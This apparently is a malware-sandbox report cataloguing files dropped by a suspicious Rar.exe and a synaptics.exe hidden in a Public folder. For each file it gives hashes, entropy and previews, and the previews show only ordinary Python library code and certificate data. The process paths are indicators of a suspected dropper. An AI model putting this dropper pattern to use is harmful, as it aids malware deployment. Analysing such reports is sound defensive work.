                                                                                                                                                                                      Preview:#..# number.py : Number-theoretic functions..#..# Part of the Python Cryptography Toolkit..#..# Written by Andrew M. Kuchling, Barry A. Warsaw, and others..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):994
                                                                                                                                                                                      Entropy (8bit):4.898132103946567
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:1RE0x1JCvE59p+vE59eE59iLdUKhGnE597pcSpShFE59cSpShFE5vUyrfunVshdU:bxX7Z+crYnJescsje
                                                                                                                                                                                      MD5:81227B5A65D7EF13CB0247C9B7225673
                                                                                                                                                                                      SHA1:8954A181B5E8D7B31145E5C139935B9780E4D1EB
                                                                                                                                                                                      SHA-256:6BD67E3A908997245FB373BC1C4971BAC0CFDD5FC17D4B7CDBD3F51AD6774AF1
                                                                                                                                                                                      SHA-512:12F42616F440853BF94758392116879BE87073F515AE0C33454BFAC2D80140DE0FCC0469E34D8E06B42436A3EDEF4B5BE8D0E7C5EFCE413CE0F89041556CCA59
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import List, Optional, Callable......def ceil_div(n: int, d: int) -> int: .....def size (N: int) -> int: .....def getRandomInteger(N: int, randfunc: Optional[Callable]=None) -> int: .....def getRandomRange(a: int, b: int, randfunc: Optional[Callable]=None) -> int: .....def getRandomNBitInteger(N: int, randfunc: Optional[Callable]=None) -> int: .....def GCD(x: int,y: int) -> int: .....def inverse(u: int, v: int) -> int: .....def getPrime(N: int, randfunc: Optional[Callable]=None) -> int: .....def getStrongPrime(N: int, e: Optional[int]=0, false_positive_prob: Optional[float]=1e-6, randfunc: Optional[Callable]=None) -> int: .....def isPrime(N: int, false_positive_prob: Optional[float]=1e-6, randfunc: Optional[Callable]=None) -> bool: .....def long_to_bytes(n: int, blocksize: Optional[int]=0) -> bytes: .....def bytes_to_long(s: bytes) -> int: .....def long2str(n: int, blocksize: Optional[int]=0) -> bytes: .....def str2long(s: bytes) -> int: .......sieve_base: List[int]..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6010
                                                                                                                                                                                      Entropy (8bit):4.8279694547928065
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:WKYFQHvoA6pDLeAIeCGtFaVBS3eKQM4ks58B1S9+Ow34eHPwAEx2pdDSSUSAJn7e:W9QHvilIUwpK5lBssOk4eldSE4n7R0ua
                                                                                                                                                                                      MD5:11D063AE5BC40D2D943DF399F95DDA04
                                                                                                                                                                                      SHA1:6D8C8391EEBDAE9FE2724F791B5D87A16E4D77CE
                                                                                                                                                                                      SHA-256:2CF7955872D7D8A23F12B9340AC867E8E342102FED7B80DBA25B6303D7992155
                                                                                                                                                                                      SHA-512:B2E2C98C03916DE5BB15F36B9A1972769825E1E514AFEA153AC292F3FFF716E589FCF009BD42459D5B7A35C456A3645F2D3D0E59DAFEF198563CDBF83F2B2245
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# Util/py3compat.py : Compatibility code for handling Py3k / Python 2.x..#..# Written in 2010 by Thorsten Behrens..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWA
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):870
                                                                                                                                                                                      Entropy (8bit):4.791491758318878
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:1REgT3JtgPnrnIW9h3MnBbRFNU+U4Fu31954iEe1oHhASLjPMQ:pZtgMcUTkDTtoBjLt
                                                                                                                                                                                      MD5:E7EC097AA59EF78A17CCA1860BE69741
                                                                                                                                                                                      SHA1:A25E52635BA19E8324128B8900378458BDAA3AF2
                                                                                                                                                                                      SHA-256:A1913976F178C28B8A7C117093233AAC0D3E772C4876DA9C084382BB95F2AC2D
                                                                                                                                                                                      SHA-512:675F6249EF76BDA58D64ABF2BEB84DA58C04A4054F380BC3C2D63CA0D0CAB3342FB36A43925C6176D494F70AC1AEFD06DDB809F28F4A3412E857ACA1F42E6451
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Union, Any, Optional, IO....Buffer = Union[bytes, bytearray, memoryview]....import sys....def b(s: str) -> bytes: .....def bchr(s: int) -> bytes: .....def bord(s: bytes) -> int: .....def tobytes(s: Union[bytes, str]) -> bytes: .....def tostr(b: bytes) -> str: .....def bytestring(x: Any) -> bool: .......def is_native_int(s: Any) -> bool: .....def is_string(x: Any) -> bool: .....def is_bytes(x: Any) -> bool: .......def BytesIO(b: bytes) -> IO[bytes]: .....def StringIO(s: str) -> IO[str]: .......if sys.version_info[0] == 2:.. from sys import maxint.. iter_range = xrange....else:.. from sys import maxsize as maxint.. iter_range = range....class FileNotFoundError:.. def __init__(self, err: int, msg: str, filename: str) -> None:.. pass....def _copy_bytes(start: Optional[int], end: Optional[int], seq: Buffer) -> bytes: .....
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5587
                                                                                                                                                                                      Entropy (8bit):4.7939511946106
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:MwDqrYJALrYJHdt3EHGuIWYIzbJRSTdOqvdJLb9YmPhv+h:9qrskrs9t3q/Ik8gqlRdhy
                                                                                                                                                                                      MD5:C08EBC91E1A45FED150F8E5608E2AF15
                                                                                                                                                                                      SHA1:80AAA3BF9159A68321B464D3DA455D3EB3713F36
                                                                                                                                                                                      SHA-256:3E36AE472CE5CFBA3B02DBF0CC2A132F868C6DA8002F5B8E895C873DDB79A029
                                                                                                                                                                                      SHA-512:ACD238B1FC40197C4EA5DAFABD79A2BDBE4BE684F4BC0AB4361EAAD16DA92220A80D26E805D2FDDE01295FF959A91F4A830EE02F4FCB91F3BB0DEDBA295C01CD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):249
                                                                                                                                                                                      Entropy (8bit):4.800678842548869
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:1REYBXyUzrIY3MTDyQdQAY0OXW6ah05gUQdByKj0ah05gv:1REYB3vIY3YyQnrOXAh05VQ6KZh05q
                                                                                                                                                                                      MD5:81C7899ED070F1D26338977374A4B853
                                                                                                                                                                                      SHA1:2627B47DA19BB2F2B8E7D25A5A57473C00C86550
                                                                                                                                                                                      SHA-256:CA7D073C74998CFFB501A2E6E1C99AF62F49272A5FDFB3527769E2A632DFE1A0
                                                                                                                                                                                      SHA-512:CF5299A774C61A0F84D6E1E4233F426CC9D854D809EEF0D6B1158EC0078E75C54C3141E835DC3D0F376B53EFB8DDE462B49B0A5093C63613B332617966F34D0C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....def strxor(term1: bytes, term2: bytes, output: Optional[Buffer]=...) -> bytes: .....def strxor_c(term: bytes, c: int, output: Optional[Buffer]=...) -> bytes: .....
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):191
                                                                                                                                                                                      Entropy (8bit):4.787641890602914
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:UFo+CmMRJ4ZdK0CJOAlFGCJ7DkCAZFBVC5uQLCY3qXVLCVDvRqvljhfxXFqYLULZ:UvZdK0pAlV/kCAZ4sdXcVz8ljZRFqI5y
                                                                                                                                                                                      MD5:CAAC9B613D9F7C76FBB1F59F51BBC300
                                                                                                                                                                                      SHA1:B085C149A8C6051BE179605BA05E49FDC46ACC7D
                                                                                                                                                                                      SHA-256:73CF19A80E8AAA2D38047F8D4600D5239F9311AA76D68EC430079E44963B6FA6
                                                                                                                                                                                      SHA-512:EF4DD006C4B3CFD5C48F94F094C3D3A02FA5A5D8185E13203A7E6715CD64CFA98E9A34764364D08AF0C959A23A700E12AC2E404AD322491CA38E75F0B3FD80CF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:__all__ = ['Cipher', 'Hash', 'Protocol', 'PublicKey', 'Util', 'Signature',.. 'IO', 'Math']....version_info = (3, 20, '0')....__version__ = ".".join([str(x) for x in version_info])..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):103
                                                                                                                                                                                      Entropy (8bit):4.320003818965119
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:1REvgBk8J0fWQLCfcJAOLRL+2MliHovcoFQy:1REYBb0fWpcFY2MtJN
                                                                                                                                                                                      MD5:BF77DB2C18C7E4E3E80EA7D09C2D8336
                                                                                                                                                                                      SHA1:682ADC1869A615EBC5152E303D7F10C9DF4800C1
                                                                                                                                                                                      SHA-256:748D33339311187C619DF8EAA40C8F1A8B4A4EB3E59DE4CDD90FA30105CD8351
                                                                                                                                                                                      SHA-512:ADD512240AB6D99FF0B4871C7F96849267CCB8CD5BE8BAB86579D5599434266F1C4C290DF395526C694110BDD67DCDA6970CEF39416AB87798AC78914AD87EB7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Tuple, Union....version_info : Tuple[int, int, Union[int, str]]..__version__ : str..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):429
                                                                                                                                                                                      Entropy (8bit):5.1601594076577095
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:y/LllGtYB21NXYvAL/tdxmAfTwAvrXGl/llYlekkvuPllf8uaHxEM9ArMDPb9tuo:CRlCY6ovkxNXjkkU48Vlhf9oyF
                                                                                                                                                                                      MD5:4A9BADA14F62DBF16041DF68C8C520DA
                                                                                                                                                                                      SHA1:207C6E4B2DD19D9D8771F79773F1F643F8DFA860
                                                                                                                                                                                      SHA-256:BF69AEF92A238EF1C25E2BE9CF6BA71006AFEE5685D193B9593022FCB38A726F
                                                                                                                                                                                      SHA-512:31F1FCCF6524311E1C711862E257FB065AF0C4D6056A1DD6AF31F07C79AF69892D022C5771CDAB35341089AA7AD626F6E3AA4EEE26173429DD3BD321BBE9B9D1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...s$...g.d...Z.d.Z.d...d.d...e.D.....Z.d.S.).).Z.CipherZ.Hash..ProtocolZ.PublicKeyZ.Util..Signature..IOZ.Math).............0...c....................C...s....g.|.].}.t.|.....q.S...)...str)....0..xr....r.....AC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\__init__.py..<listcomp>....s......r....N)...__all__..version_info..join..__version__r....r....r....r......<module>....s..........
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6128
                                                                                                                                                                                      Entropy (8bit):4.5356053660225255
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:5KauPveem/xBJCPrGXw+5frsfnCUypLOq6LIrqCWPANPuqlT6+Z:5ePGJ//oKYkpCNsrqoWe6+Z
                                                                                                                                                                                      MD5:128079C84580147FD04E7E070340CB16
                                                                                                                                                                                      SHA1:9BD1AE6606CCD247F80960ABBC7D7F78AEEC4B86
                                                                                                                                                                                      SHA-256:4D27A48545B57DD137AE35376FCF326D2064271084A487960686F8704B94DE4A
                                                                                                                                                                                      SHA-512:CF9D54474347D15AD1B8B89B2E58B850AD3595EEC54173745BDE86F94F75B39634BE195A3AEF69D71CB709ECFF79C572A66B1458A86FA2779F043A83A5D4CC4C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# don't import any costly modules.import sys.import os...is_pypy = '__pypy__' in sys.builtin_module_names...def warn_distutils_present():. if 'distutils' not in sys.modules:. return. if is_pypy and sys.version_info < (3, 7):. # PyPy for 3.6 unconditionally imports distutils, so bypass the warning. # https://foss.heptapod.net/pypy/pypy/-/blob/be829135bc0d758997b3566062999ee8b23872b4/lib-python/3/site.py#L250. return. import warnings.. warnings.warn(. "Distutils was imported before Setuptools, but importing Setuptools ". "also replaces the `distutils` module in `sys.modules`. This may lead ". "to undesirable behaviors or errors. To avoid these issues, avoid ". "using distutils directly, ensure that setuptools is installed in the ". "traditional way (e.g. not an editable install), and/or make sure ". "that setuptools is always imported before distutils.". )...def clear_distutils():. if 'distutils' not
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7565
                                                                                                                                                                                      Entropy (8bit):5.077960620041668
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:CcgPE5vVnnqs8NYd7pqqx0H/8qq/xqqqRuLMJXHge3YbkqZPqqq3KqUCwqEMlkgM:iyvVnnqs+67pqqx0H/8qq/xqqqRuLMXC
                                                                                                                                                                                      MD5:F1B3F48EEC933CE3FFBF04D9491C7030
                                                                                                                                                                                      SHA1:D17D3E671239F251D4AC41FE7D131ECFF54FE30A
                                                                                                                                                                                      SHA-256:0B47CD1E081140003F145547AB73754801F8C5D7996F6D66B1408A3F5508A652
                                                                                                                                                                                      SHA-512:466A695F9C72ED87A2425BE5C776BAF9A51ACC82F86AF6D93D8C033589C6F3DF9DC76E6F26A893E9701694C3BEA1334B8C01F1674925121FE30BC4B0C7B8DD83
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...s....d.d.l.Z.d.d.l.Z.d.e.j.v.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d...Z.e.j.D.].Z.e.e.d.e.....e.j.....q2e...Z.d.d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.d.S.)......NZ.__pypy__c....................C...s6...d.t.j.v.r.d.S.t.r.t.j.d.k.r.d.S.d.d.l.}.|...d.....d.S.).N..distutils)...........r....a....Distutils was imported before Setuptools, but importing Setuptools also replaces the `distutils` module in `sys.modules`. This may lead to undesirable behaviors or errors. To avoid these issues, avoid using distutils directly, ensure that setuptools is installed in the traditional way (e.g. not an editable install), and/or make sure that setuptools is always imported before distutils.)...sys..modules..is_pypy..version_info..warnings..warn).r......r.....JC:\Users\Public\QExvbmVOb25l\lib\site-packages\_distutils_hack\__init__.py..warn_distutils_present....s....................r....c....................C...sF...d.t.j.v.r.d.S.d.d.l.}.|...
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):44
                                                                                                                                                                                      Entropy (8bit):4.171453562658727
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:5QW6BMW2y+CBhTEu:+96W2y+4hx
                                                                                                                                                                                      MD5:012A3E19D518D130A36BEAF917A091C7
                                                                                                                                                                                      SHA1:358F87C599947263E8ADF079CB2131A522876AF8
                                                                                                                                                                                      SHA-256:12EFECF8D17A5486780AA774B5B6C0E70B56932D8864F35DF1EB7A18BB759B3A
                                                                                                                                                                                      SHA-512:76D17C1246B920B7E71F196876A2FCD6A3E102F10933CAC558DD993B6AA794766D657B85E0A7E56A71DF5F14C2F95A9E6576D81163509BB42DEC0FC0E49B9998
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:__import__('_distutils_hack').do_override().
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):94
                                                                                                                                                                                      Entropy (8bit):4.540785862491583
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:1LGzbQbAwLSkTRFo+HGip4TjLvf0n:1LcQbjrRJGA4Tfcn
                                                                                                                                                                                      MD5:D55B9B12960DB04D3C358F429B5E858F
                                                                                                                                                                                      SHA1:33E92FDF397E4E36A738BAEF1C0F23A3AEACF424
                                                                                                                                                                                      SHA-256:A7F19866B8D4C0F0548692E5099A066F49A2281292A83032642E43BC8BAA6C74
                                                                                                                                                                                      SHA-512:BD86630643723CE20C8FACD6AC54740BAD539CE5E6CCCB65CC3F25E1CB56EF6516C9D5B83799EF3BE675B700BED8AD3CDAAAFF64607EDB3D035DF5AE07A71075
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from .core import contents, where..__all__ = ["contents", "where"].__version__ = "2024.08.30".
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):243
                                                                                                                                                                                      Entropy (8bit):4.451797874382859
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:JW6yXBbjB2V+WuSZFeewrCy00y+0re6r/hu:JWfQYWuSZWFdQhu
                                                                                                                                                                                      MD5:269E7F0CA2FA570B10E690595E6AEDAB
                                                                                                                                                                                      SHA1:F09C4BA5E7EE37DDEBE914DEF9D97152CB5EB856
                                                                                                                                                                                      SHA-256:C410688FDD394D45812D118034E71FEE88BA7BEDDD30FE1C1281BD3B232CD758
                                                                                                                                                                                      SHA-512:01CA6DF3FB218B374BBA6653F5E72D6D6A9B07BB22215D5D96D2155DF037A9C6ED8D4F0FF8C789231A6C8C2555229700056FF6F740516F42F839E057FFF59F70
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import argparse..from certifi import contents, where..parser = argparse.ArgumentParser().parser.add_argument("-c", "--contents", action="store_true").args = parser.parse_args()..if args.contents:. print(contents()).else:. print(where()).
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):272
                                                                                                                                                                                      Entropy (8bit):5.097538040202817
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:y/AJteNbsZvEG/Xg6nCbWjN2o3IaHxEM9Arsq4G:CAjeNQeGVN2ojlBq7
                                                                                                                                                                                      MD5:92F03D402A2988001BDEDB93D73BD709
                                                                                                                                                                                      SHA1:27785FB8BA5DB650F11E3A90BCD5F1326C956902
                                                                                                                                                                                      SHA-256:B795AFDAB8365E5C9193A7C44ED397B36A5C3BFBDAAB9D587A53CE239BF5A0D0
                                                                                                                                                                                      SHA-512:0D327CCA763A4920B65D437A5ABB072D8D7D243880281E2E8AF5A5467A90733C8D974F10AD256BE1CDB427F206FE2AD1EECC0D97CBEF768C6ECA6A4719B887A3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f^........................@...s ...d.d.l.m.Z.m.Z...d.d.g.Z.d.Z.d.S.)......)...contents..wherer....r....z.2024.08.30N)...corer....r......__all__..__version__..r....r.....BC:\Users\Public\QExvbmVOb25l\lib\site-packages\certifi\__init__.py..<module>....s..........
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2103
                                                                                                                                                                                      Entropy (8bit):4.948477442954396
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:tNBUoxmgDZLaFAl/g95K3Q8+epPUHq7J8nH:dUC/mcg955epA1H
                                                                                                                                                                                      MD5:1DD8E7AAB24773A886ACA66D0C34B858
                                                                                                                                                                                      SHA1:452361889D3B8117924A4F5715891A6FAE81A3E5
                                                                                                                                                                                      SHA-256:BE908C0F0FFB373A545E6D830FDF9CD690FD0B8F5A5E3AAF0D4BED5F156C2069
                                                                                                                                                                                      SHA-512:AB99225657C56D039C2A9F39C4EE682243B493E6F19A683568B96B7F1AC4B4C9C23334095A4F2A8862F028B109590E7C1E66F9C56BB3393E22111A8CB2E973B4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..fJ........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.d...Z.e.j.d.k.r0d.d.l.m.Z.m.Z...d.a.d.a.d.e.f.d.d...Z.d.e.f.d.d...Z.d.S.e.j.d.k.rQd.d.l.m.Z.m.Z...d.a.d.a.d.e.f.d.d...Z.d.e.f.d.d...Z.d.S.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.e.j.e.f...Z.e.e.d.f...Z.....d.d.e.d.e.d.e.d.e.d.e.f.d.d...Z.d.e.f.d.d...Z.d.e.f.d.d...Z.d.S.).ze.certifi.py.~~~~~~~~~~..This module returns the installation location of cacert.pem or its contents.......N..returnc....................C...s....t...d.d.d.....d.S.).N)..._CACERT_CTX..__exit__..r....r.....>C:\Users\Public\QExvbmVOb25l\lib\site-packages\certifi\core.py..exit_cacert_ctx....s......r....)...........)...as_file..filesc....................C...s4...t.d.u.r.t.t.d.....d.....a.t.t.......a.t...t.....t.S...N..certifi..cacert.pem)..._CACERT_PATHr....r......joinpathr......str..__enter__..atexit..registerr....r....r....r....r......where....s..............r....c....................C...s....t.d.....d...j.d.d...S...Nr....r......ascii....encoding).r....r......r
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):299427
                                                                                                                                                                                      Entropy (8bit):6.047872935262006
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/QRSRqNb7d8iu5Nahx:QWb/TRJLWURrI5RWavdF08/
                                                                                                                                                                                      MD5:50EA156B773E8803F6C1FE712F746CBA
                                                                                                                                                                                      SHA1:2C68212E96605210EDDF740291862BDF59398AEF
                                                                                                                                                                                      SHA-256:94EDEB66E91774FCAE93A05650914E29096259A5C7E871A1F65D461AB5201B47
                                                                                                                                                                                      SHA-512:01ED2E7177A99E6CB3FBEF815321B6FA036AD14A3F93499F2CB5B0DAE5B713FD2E6955AA05F6BDA11D80E9E0275040005E5B7D616959B28EFC62ABB43A3238F0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4426
                                                                                                                                                                                      Entropy (8bit):4.499383603039266
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:+zn9FkdjbY7xDh07FkFDbq7LItY03xWtVwuZprf3:+zPkhGDh0BkpaIu03skun3
                                                                                                                                                                                      MD5:E41003E9791742059C2298D07A1E828B
                                                                                                                                                                                      SHA1:1F4014D3956D5773FAA402212DF114AC63168FFA
